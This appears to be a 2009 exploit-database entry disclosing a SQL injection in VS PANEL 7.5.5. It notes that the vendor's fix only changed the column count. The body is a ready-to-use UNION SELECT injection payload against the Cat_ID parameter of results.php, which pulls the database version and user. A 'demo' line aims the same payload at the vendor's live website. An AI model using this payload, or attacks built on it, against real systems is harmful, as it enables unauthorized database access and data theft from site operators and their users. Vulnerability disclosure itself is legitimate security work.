[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : VS PANEL 7.5.5 (Cat_ID) SQL Injection Vulnerability (patched?)
# Published : 2009-07-27
# Author : octopos
# Previous Title : iWiccle 1.01 (LFI/SQL) Multiple Remote Vulnerabilities
# Next Title : PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln
#################### Infos ########################################
# [Re]Found : Otavio Augusto a.k.a octopos ( octopos8?gmail.com ) #
# Product: VS PANEL v.7.5.5 (Patched?) #
# Homepage: http://www.vspanel.gr/ #
###################################################################
############################################################
# Bug Original posted in http://milw0rm.com/exploits/9171 #
# Appears that VS PANELS V7.5.5 was "corrected" the bug #
# changing the number of columns to 26... Oo #
############################################################
############################################## SQL Injection #################################################################################
# site/path/results.php?Cat_ID=null+union+all+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- #
##############################################################################################################################################
############################################### Demo ###################################################################################################
# http://www.vspanel.gr/results.php?Cat_ID=null++union+all+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- #
########################################################################################################################################################
# www.Syue.com [2009-07-27]